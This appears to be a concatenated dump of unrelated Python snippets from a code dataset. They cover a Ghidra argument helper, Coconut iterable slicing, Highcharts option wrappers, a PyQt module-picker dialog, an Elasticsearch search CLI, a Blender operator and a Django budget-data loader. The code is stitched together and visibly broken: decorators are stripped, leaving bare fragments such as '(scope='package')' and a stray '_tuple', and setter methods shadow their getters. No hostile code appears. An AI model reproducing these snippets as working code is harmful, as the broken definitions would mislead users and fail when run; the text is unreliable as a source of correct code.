    """Locate *key_string* among a call's argument values and extract its format info.

    *call_args* is a per-call cache of recovered argument values. Returns the
    filtered relevant indices, or [] when no argument value contains the key.
    """
    # Use the cached argument values for this call site if present.
    if (call in call_args):
        arg_values = call_args[call]
    else:
        (_, arg_values) = get_call_site_args(ghidra_analysis, func, call, sources)
        call_args[call] = arg_values
    start = 1
    for arg_value in arg_values:
        strings = [arg for arg in arg_value if isinstance(arg, str)]
        if (key_string in '\t'.join(strings)):
            # NOTE(review): only the first element of arg_value is examined
            # (break after one iteration); if arg_value is empty, `indices`
            # and `format_types` stay unbound and the return below raises
            # NameError — confirm whether that input is possible upstream.
            for arg in arg_value:
                indices = get_format_specifier_indices(key_string, arg)
                format_types = get_format_types(arg)
                break
            break
        start += 1
    else:
        # key_string not found in any argument value.
        return []
    return filter_relevant_indices(start, arg_values, indices, format_types)
def _coconut_iter_getitem(iterable, index):
    """Implement Coconut's `iterable$[index]`: lazy indexing/slicing of any iterable.

    Delegates to __iter_getitem__ / __getitem__ / __reversed__ when the object
    provides them; otherwise consumes the iterator lazily, using bounded
    deques to handle negative start/stop without materializing everything.
    """
    # Fast path: let the object index itself if it knows how.
    obj_iter_getitem = _coconut.getattr(iterable, '__iter_getitem__', None)
    if ((obj_iter_getitem is None) and _coconut.isinstance(iterable, _coconut.abc.Sequence)):
        obj_iter_getitem = _coconut.getattr(iterable, '__getitem__', None)
    if (obj_iter_getitem is not None):
        try:
            result = obj_iter_getitem(index)
        except _coconut.NotImplementedError:
            # Object declined; fall through to the generic machinery.
            pass
        else:
            return result
    # Scalar index: a single element, not a slice.
    if (not _coconut.isinstance(index, _coconut.slice)):
        index = _coconut.operator.index(index)
        if (index < 0):
            # Negative index: keep only the last |index| items.
            return _coconut.collections.deque(iterable, maxlen=(- index))[0]
        result = _coconut.next(_coconut.itertools.islice(iterable, index, (index + 1)), _coconut_sentinel)
        if (result is _coconut_sentinel):
            raise _coconut.IndexError('.$[] index out of range')
        return result
    # Slice: normalize start/stop/step to ints (or None).
    start = (_coconut.operator.index(index.start) if (index.start is not None) else None)
    stop = (_coconut.operator.index(index.stop) if (index.stop is not None) else None)
    step = (_coconut.operator.index(index.step) if (index.step is not None) else 1)
    if (step == 0):
        raise _coconut.ValueError('slice step cannot be zero')
    # Special-case full reversal [::-1] via __reversed__ when available.
    if ((start is None) and (stop is None) and (step == (- 1))):
        obj_reversed = _coconut.getattr(iterable, '__reversed__', None)
        if (obj_reversed is not None):
            try:
                result = obj_reversed()
            except _coconut.NotImplementedError:
                pass
            else:
                if (result is not _coconut.NotImplemented):
                    return result
    if (step >= 0):
        start = (0 if (start is None) else start)
        if (start < 0):
            # Negative start: buffer the tail with an enumerated deque so the
            # total length is recoverable from the last stored index.
            cache = _coconut.collections.deque(_coconut.enumerate(iterable, 1), maxlen=(- start))
            len_iter = (cache[(- 1)][0] if cache else 0)
            i = _coconut.max((len_iter + start), 0)
            if (stop is None):
                j = len_iter
            elif (stop >= 0):
                j = _coconut.min(stop, len_iter)
            else:
                j = _coconut.max((len_iter + stop), 0)
            n = (j - i)
            if (n <= 0):
                return ()
            if ((n < (- start)) or (step != 1)):
                cache = _coconut.itertools.islice(cache, 0, n, step)
            return _coconut_map(_coconut.operator.itemgetter(1), cache)
        elif ((stop is None) or (stop >= 0)):
            # Plain forward slice: islice handles it directly.
            return _coconut.itertools.islice(iterable, start, stop, step)
        else:
            # Non-negative start with negative stop needs the helper.
            return _coconut_iter_getitem_special_case(iterable, start, stop, step)
    else:
        # Negative step.
        start = ((- 1) if (start is None) else start)
        if ((stop is not None) and (stop < 0)):
            # Buffer the last (-stop - 1) items, then slice the buffered tail.
            n = ((- stop) - 1)
            cache = _coconut.collections.deque(_coconut.enumerate(iterable, 1), maxlen=n)
            len_iter = (cache[(- 1)][0] if cache else 0)
            if (start < 0):
                (i, j) = (start, stop)
            else:
                (i, j) = (_coconut.min((start - len_iter), (- 1)), None)
            return _coconut_map(_coconut.operator.itemgetter(1), _coconut.tuple(cache)[i:j:step])
        else:
            if (stop is not None):
                # Skip the first stop+1 items; the rest participate in the slice.
                m = (stop + 1)
                iterable = _coconut.itertools.islice(iterable, m, None)
            if (start < 0):
                i = start
                n = None
            elif (stop is None):
                i = None
                n = (start + 1)
            else:
                i = None
                n = (start - stop)
            if (n is not None):
                if (n <= 0):
                    return ()
                iterable = _coconut.itertools.islice(iterable, 0, n)
            # Materialize the bounded prefix and apply the negative step.
            return _coconut.tuple(iterable)[i::step]
class OptionSeriesAreasplinerangeDataEvents(Options):
    """Generated Highcharts option wrapper for per-point event handlers.

    Each event appears as a getter/setter pair sharing one name.
    NOTE(review): as written the later def shadows the earlier one — the
    @property / @<name>.setter decorators appear to have been stripped
    from this extract. TODO confirm against the generator's output.
    """

    def click(self):
        return self._config_get(None)

    def click(self, value: Any):
        self._config(value, js_type=False)

    def drag(self):
        return self._config_get(None)

    def drag(self, value: Any):
        self._config(value, js_type=False)

    def dragStart(self):
        return self._config_get(None)

    def dragStart(self, value: Any):
        self._config(value, js_type=False)

    def drop(self):
        return self._config_get(None)

    def drop(self, value: Any):
        self._config(value, js_type=False)

    def mouseOut(self):
        return self._config_get(None)

    def mouseOut(self, value: Any):
        self._config(value, js_type=False)

    def mouseOver(self):
        return self._config_get(None)

    def mouseOver(self, value: Any):
        self._config(value, js_type=False)

    def remove(self):
        return self._config_get(None)

    def remove(self, value: Any):
        self._config(value, js_type=False)

    def select(self):
        return self._config_get(None)

    def select(self, value: Any):
        self._config(value, js_type=False)

    def unselect(self):
        return self._config_get(None)

    def unselect(self, value: Any):
        self._config(value, js_type=False)

    def update(self):
        return self._config_get(None)

    def update(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesItemStatesHoverMarker(Options):
    """Generated Highcharts option wrapper for hover-state marker settings.

    Options appear as getter/setter pairs sharing one name.
    NOTE(review): as written the later def shadows the earlier one — the
    @property / @<name>.setter decorators appear to have been stripped
    from this extract. TODO confirm against the generator's output.
    """

    def enabled(self):
        return self._config_get(None)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def enabledThreshold(self):
        # Default threshold: 2.
        return self._config_get(2)

    def enabledThreshold(self, num: float):
        self._config(num, js_type=False)

    def fillColor(self):
        return self._config_get(None)

    def fillColor(self, text: str):
        self._config(text, js_type=False)

    def height(self):
        return self._config_get(None)

    def height(self, num: float):
        self._config(num, js_type=False)

    def lineColor(self):
        # Default marker outline colour: white.
        return self._config_get('#ffffff')

    def lineColor(self, text: str):
        self._config(text, js_type=False)

    def lineWidth(self):
        return self._config_get(0)

    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    def radius(self):
        return self._config_get(4)

    def radius(self, num: float):
        self._config(num, js_type=False)

    def width(self):
        return self._config_get(None)

    def width(self, num: float):
        self._config(num, js_type=False)
def import_symbol(symbol_path):
    """Resolve 'pkg.mod.name' or 'pkg.mod:expr' to the named object.

    The ':' form evaluates the right-hand side in the imported module's
    namespace. NOTE: that uses eval — only pass trusted paths.
    """
    if ':' in symbol_path:
        module_name, expr = symbol_path.split(':')
        module = import_module(module_name)
        return eval(expr, module.__dict__)
    parts = symbol_path.split('.')
    module_name = '.'.join(parts[:-1])
    attr_name = parts[-1]
    module = __import__(module_name, globals(), locals(), [attr_name])
    return getattr(module, attr_name)
def add_tags(ids: List[int], tags: List[str]):
    """Append each tag in `tags` to the tag string of every note in `ids`.

    Tag strings are stored space-delimited and space-padded (' a b ');
    tags a note already carries are not duplicated. No-op when `tags` or
    `ids` is None, or `ids` is empty.
    """
    if (tags is None) or (ids is None) or (len(ids) == 0):
        return
    conn = _get_connection()
    try:
        # Parameterized IN (...) clause instead of interpolating the ids
        # into the SQL text — avoids injection via non-integer ids.
        placeholders = ','.join('?' for _ in ids)
        notes = conn.execute(
            f'select id, tags from notes where id in ({placeholders})',
            [str(id) for id in ids],
        ).fetchall()
        updated = []
        for nid, tstr in notes:
            spl = tstr.split(' ')
            for t in tags:
                t = t.strip()
                if t not in spl:
                    spl.append(t)
            # Normalize: strip every token, re-pad with surrounding spaces.
            spl = [s.strip() for s in spl]
            updated.append((' %s ' % ' '.join(spl), nid))
        conn.executemany('update notes set tags = ? where id= ?', updated)
        conn.commit()
    finally:
        # Close even on failure — the original leaked the connection when a
        # query raised.
        conn.close()
class stalkerForm(QDialog, Ui_StalkerDialog):
    """Dialog for choosing a target module plus an offset or symbol.

    After `accept()`, the selection is available as `self.moduleName`,
    `self.offset` and `self.symbol`.
    """

    def __init__(self, parent=None):
        super(stalkerForm, self).__init__(parent)
        self.setupUi(self)
        self.setWindowOpacity(0.93)
        # Initialize state BEFORE wiring signals so no handler can observe
        # (or be clobbered by) a partially constructed dialog — the original
        # assigned self.modules last, after all connects.
        self.modules = None
        self.btnSubmit.clicked.connect(self.submit)
        self.btnClear.clicked.connect(self.clearUi)
        self.clearUi()
        self.flushCmb()
        self.listModule.itemClicked.connect(self.ModuleItemClick)
        self.txtModule.textChanged.connect(self.changeModule)
        self.cmbPackage.currentTextChanged.connect(self.changePackage)

    def initData(self):
        """Fill the module list widget from `self.modules`."""
        self.listModule.clear()
        for item in self.modules:
            self.listModule.addItem(item)

    def flushCmb(self):
        """Populate the package combo box from ./tmp/*.modules.txt files."""
        self.cmbPackage.clear()
        files = os.listdir('./tmp/')
        self.cmbPackage.addItem('tmp data')
        for item in files:
            if '.modules.txt' in item:
                self.cmbPackage.addItem(item.replace('.modules.txt', ''))

    def ModuleItemClick(self, item):
        """Copy the clicked module name into the module text field."""
        self.txtModule.setText(item.text())

    def changeModule(self, data):
        """Filter the module list to entries containing `data`."""
        # `is None` instead of `== None` (identity check for the sentinel).
        if (self.modules is None) or (len(self.modules) <= 0):
            return
        if (data == '') or (data == 'tmp data'):
            return
        self.listModule.clear()
        if len(data) > 0:
            for item in self.modules:
                if data in item:
                    self.listModule.addItem(item)
        else:
            for item in self.modules:
                self.listModule.addItem(item)

    def changePackage(self, data):
        """Load the module list for the selected package file."""
        if (data == '') or (data == 'tmp data'):
            return
        filepath = ('./tmp/' + data) + '.modules.txt'
        with open(filepath, 'r', encoding='utf-8') as packageFile:
            res = packageFile.read()
        self.modules = res.split('\n')
        self.initData()

    def clearUi(self):
        """Reset all three input fields."""
        self.txtSymbol.setText('')
        self.txtOffset.setText('')
        self.txtModule.setText('')

    def submit(self):
        """Validate inputs, stash them on self, and accept the dialog."""
        moduleName = self.txtModule.text()
        offset = self.txtOffset.text()
        symbol = self.txtSymbol.text()
        if len(moduleName) <= 0:
            QMessageBox().information(self, 'hint', 'missing module')
            return
        if (len(offset) <= 0) and (len(symbol) <= 0):
            QMessageBox().information(self, 'hint', 'must enter offset or symbol')
            return
        self.moduleName = moduleName
        self.offset = offset
        self.symbol = symbol
        self.accept()
def _on_monitor_change(**kwargs):
    """Relay a monitored attribute change to the attached session.

    Expected kwargs: fieldname, obj, name, session, outputfunc_name.
    Sends ``session.msg(<outputfunc_name>={'name', ['category'], 'value'})``;
    does nothing when no session is present.
    """
    fieldname = kwargs['fieldname']
    obj = kwargs['obj']
    name = kwargs['name']
    session = kwargs['session']
    outputfunc_name = kwargs['outputfunc_name']
    category = None
    # Category-indexed fields arrive as 'field[<category>]'; strip the
    # suffix so _GA() is called with the bare attribute name.
    # (`is not None` — identity test, not equality, per PEP 8.)
    if hasattr(obj, 'db_category') and (obj.db_category is not None):
        category = obj.db_category
        fieldname = fieldname.replace('[{}]'.format(obj.db_category), '')
    if session:
        callsign = {outputfunc_name: {'name': name,
                                      **({'category': category} if (category is not None) else {}),
                                      'value': _GA(obj, fieldname)}}
        session.msg(**callsign)
class TestCategoryShare(BaseDataQualityCategoryMetricsTest):
    """Test on the share (ratio) of a single category within a column."""

    name: ClassVar = 'Share of category'
    alias: ClassVar = 'share_category'

    def get_condition_from_reference(self, reference: Optional[CategoryStat]) -> float:
        """Derive the expected share from reference stats; raise when absent."""
        if reference is None:
            raise ValueError('Neither required test parameters nor reference data has been provided.')
        return reference.category_ratio

    def calculate_value_for_test(self) -> Numeric:
        """Current share of the category in the analyzed data."""
        return self.metric.get_result().current.category_ratio

    def get_description(self, value: Numeric) -> str:
        """Human-readable summary comparing the measured share to the threshold."""
        result = self.metric.get_result()
        return (
            f"The share of category '{result.category}' in the column "
            f"**{self.column_name.display_name}** is {value:.3g} "
            f"({result.current.category_num} out of {result.current.all_num}). "
            f"The test threshold is {self.get_condition()}."
        )

    def get_parameters(self) -> CheckValueParameters:
        """Bundle condition, measured value and category for reporting."""
        return ValueListParameters(condition=self.get_condition(), value=self._value, category=self.category)
(scope='package')
def pysoa_client_json():
    """Build a PySOA Client whose echo/meta/user transports all serialize as JSON."""
    config = copy.deepcopy(_base_config)
    # Apply the JSON serializer uniformly instead of repeating the assignment.
    for service in ('echo', 'meta', 'user'):
        config[service]['transport']['kwargs']['default_serializer_config'] = _json_serializer
    return Client(config=config, expansion_config=_expansion_config)
class SizedArrayDecoder(BaseArrayDecoder):
    """Decoder for fixed-size arrays: yields exactly `array_size` items.

    A fixed-size array is dynamic iff its element decoder is dynamic.
    """
    # Number of elements; expected to be populated externally
    # (subclass attribute or BaseArrayDecoder kwargs) — None here.
    array_size = None
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Dynamism is inherited from the element type.
        self.is_dynamic = self.item_decoder.is_dynamic
    # NOTE(review): the bare `_tuple` below looks like the tail of a
    # stripped decorator (e.g. `@to_tuple`) lost in extraction — TODO
    # confirm; as written it is a no-op name reference that would raise
    # NameError at class-creation time.
    _tuple
    def decode(self, stream):
        # Decode `array_size` consecutive items from the stream.
        for _ in range(self.array_size):
            (yield self.item_decoder(stream))
_group.command('event-search')
('query')
('--index', '-i', multiple=True, help='Index patterns to search against')
('--eql/--lucene', '-e/-l', 'language', default=None, help='Query language used (default: kql)')
('--date-range', '-d', type=(str, str), default=('now-7d', 'now'), help='Date range to scope search')
('--count', '-c', is_flag=True, help='Return count of results only')
('--max-results', '-m', type=click.IntRange(1, 1000), default=100, help='Max results to return (capped at 1000)')
('--verbose', '-v', is_flag=True, default=True)
_client('elasticsearch')
def event_search(query, index, language, date_range, count, max_results, verbose=True, elasticsearch_client: Elasticsearch=None):
    """Search events in Elasticsearch (or just count matches) for `query`."""
    start_time, end_time = date_range
    target_indexes = index or ('*',)
    # Flag semantics: None -> kql (default), True -> eql, False -> lucene.
    if language is None:
        language_used = 'kql'
    elif language is True:
        language_used = 'eql'
    else:
        language_used = 'lucene'
    collector = CollectEvents(elasticsearch_client, max_results)
    if verbose:
        click.echo(f"searching {','.join(target_indexes)} from {start_time} to {end_time}")
        click.echo(f'{language_used}: {query}')
    if count:
        results = collector.count(query, language_used, target_indexes, start_time, end_time)
        click.echo(f'total results: {results}')
        return results
    results = collector.search(query, language_used, target_indexes, start_time, end_time, max_results)
    click.echo(f'total results: {len(results)} (capped at {max_results})')
    click.echo_via_pager(json.dumps(results, indent=2, sort_keys=True))
    return results
class OptionSeriesBoxplotSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
    """Config wrapper for the sonification tremolo-speed mapping options.

    Each option is exposed as a getter/setter pair sharing one name; the
    getter returns the stored value (with the shown default), the setter
    writes it via ``self._config(..., js_type=False)``.
    NOTE(review): upstream @property/@setter decorators appear stripped by
    extraction — as written each setter def shadows its getter. TODO
    confirm against the original generated source.
    """
    def mapFunction(self):
        """Getter for `mapFunction` (default: None)."""
        return self._config_get(None)
    def mapFunction(self, value: Any):
        """Setter for `mapFunction`."""
        self._config(value, js_type=False)
    def mapTo(self):
        """Getter for `mapTo` (default: None)."""
        return self._config_get(None)
    def mapTo(self, text: str):
        """Setter for `mapTo`."""
        self._config(text, js_type=False)
    def max(self):
        """Getter for `max` (default: None)."""
        return self._config_get(None)
    def max(self, num: float):
        """Setter for `max`."""
        self._config(num, js_type=False)
    def min(self):
        """Getter for `min` (default: None)."""
        return self._config_get(None)
    def min(self, num: float):
        """Setter for `min`."""
        self._config(num, js_type=False)
    def within(self):
        """Getter for `within` (default: None)."""
        return self._config_get(None)
    def within(self, value: Any):
        """Setter for `within`."""
        self._config(value, js_type=False)
class StalkerSceneAddAllShotPrevisOutputsOperator(bpy.types.Operator):
    """Blender operator that processes the Stalker scene task given by id."""

    bl_label = 'Add All Shot Previs Outputs'
    bl_idname = 'stalker.scene_add_all_shot_previs_outputs_op'
    stalker_entity_id = bpy.props.IntProperty(name='stalker_entity_id')
    stalker_entity_name = bpy.props.StringProperty(name='stalker_entity_name')

    def execute(self, context):
        """Look up the scene Task and report completion to Blender."""
        logger.debug('inside %s.execute()' % self.__class__.__name__)
        scene_task = Task.query.get(self.stalker_entity_id)
        logger.debug('scene: %s' % scene_task)
        return {'FINISHED'}
class Command(BaseCommand):
    """Management command: load historical budget authority data from CSV/XLS."""

    help = 'Loads historical budget authority data from a CSV'
    DEFAULT_DIRECTORY_PATH = os.path.join('usaspending_api', 'data', 'budget_authority')

    def add_arguments(self, parser):
        parser.add_argument('-q', '--quarter', type=valid_quarter, help='Quarter to load from spreadsheets in data/budget_authority/quarterly')
        parser.add_argument('-d', '--directory', default=self.DEFAULT_DIRECTORY_PATH, help='Directory containing broker_rules_fr_entity.xlsx, budget_authority.csv, and quarterly/ directory')

    def load_frec_map(self):
        """Rebuild the FrecMap table from broker_rules_fr_entity.xlsx (2nd sheet)."""
        frec_map_path = os.path.join(self.directory, 'broker_rules_fr_entity.xlsx')
        workbook = open_workbook(frec_map_path)
        sheet = list(workbook.sheets())[1]
        # Header row is row index 3; data rows start at index 4.
        headers = [cell.value for cell in sheet.row(3)]
        FrecMap.objects.all().delete()
        instances = []
        for i in range(4, sheet.nrows):
            row = dict(zip(headers, (cell.value for cell in sheet.row(i))))
            logger.info('Load FREC Map: AID {} / MAC {} / TAS {}'.format(row['AID'], row['MAIN'], row['GWA_TAS_NAME']))
            instances.append(FrecMap(
                agency_identifier=row['AID'],
                main_account_code=row['MAIN'],
                treasury_appropriation_account_title=row['GWA_TAS_NAME'],
                sub_function_code=row['Sub Function Code'],
                fr_entity_code=row['FR Entity Type'],
            ))
        logger.info('Running bulk create across FREC map...')
        FrecMap.objects.bulk_create(instances)

    def load_quarterly_spreadsheets(self, quarter, results, overall_totals):
        """Add line-2500 Q<quarter>_AMT amounts from quarterly/*.xls for the current FY."""
        quarterly_path = os.path.join(self.directory, 'quarterly', '*.xls')
        this_fy = fy(date.today())
        overall_totals[this_fy] = 0
        amount_column = 'Q{}_AMT'.format(quarter)
        for filename in glob.glob(quarterly_path):
            workbook = open_workbook(filename)
            sheet = list(workbook.sheets())[0]
            headers = [cell.value for cell in sheet.row(0)]
            for i in range(1, sheet.nrows):
                row = dict(zip(headers, (cell.value for cell in sheet.row(i))))
                if row['LNO'] == '2500':
                    # Spreadsheet amounts are in thousands of dollars.
                    dollars = int(row[amount_column]) * 1000
                    results[(row['TRAG'], None, this_fy)] = dollars
                    overall_totals[this_fy] += dollars

    def find_frec(self, agency_identifier, row):
        """Return the FR entity code matching agency/account/subfunction, or None."""
        frec_inst = FrecMap.objects.filter(agency_identifier=agency_identifier, main_account_code=row['Account Code'], sub_function_code=row['Subfunction Code'])
        if frec_inst.exists():
            return frec_inst.first().fr_entity_code

    def handle(self, *args, **options):
        """Entry point: reload FREC map, historical CSV, optional quarterly data."""
        self.directory = options['directory']
        self.load_frec_map()
        historical_path = os.path.join(self.directory, 'budget_authority.csv')
        overall_totals = defaultdict(int)
        results = defaultdict(int)
        with open(historical_path) as infile:
            BudgetAuthority.objects.all().delete()
            reader = csv.DictReader(infile)
            for row in reader:
                agency_identifier = row['Treasury Agency Code'].zfill(3)
                logger.info('Loading agency identifier from file: {}'.format(agency_identifier))
                # Single lookup via find_frec(); the previous inline query was
                # dead code (its result was immediately overwritten) and hit
                # the database a second time per row.
                frec = self.find_frec(agency_identifier, row)
                for year in range(1976, 2023):
                    # CSV amounts are comma-grouped thousands of dollars.
                    amount = int(row[str(year)].replace(',', '')) * 1000
                    results[(agency_identifier, frec, year)] += amount
                    overall_totals[year] += amount
        quarter = options['quarter']
        if quarter:
            self.load_quarterly_spreadsheets(quarter, results, overall_totals)
        else:
            logger.info('No quarter given. Quarterly spreadsheets not loaded.')
        logger.info('Running bulk create across agencies...')
        BudgetAuthority.objects.bulk_create((BudgetAuthority(agency_identifier=agency_identifier, fr_entity_code=frec, year=year, amount=amount) for ((agency_identifier, frec, year), amount) in results.items()))
        logger.info('Running bulk create across totals...')
        OverallTotals.objects.bulk_create((OverallTotals(fiscal_year=year, total_budget_authority=amount) for (year, amount) in overall_totals.items()))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.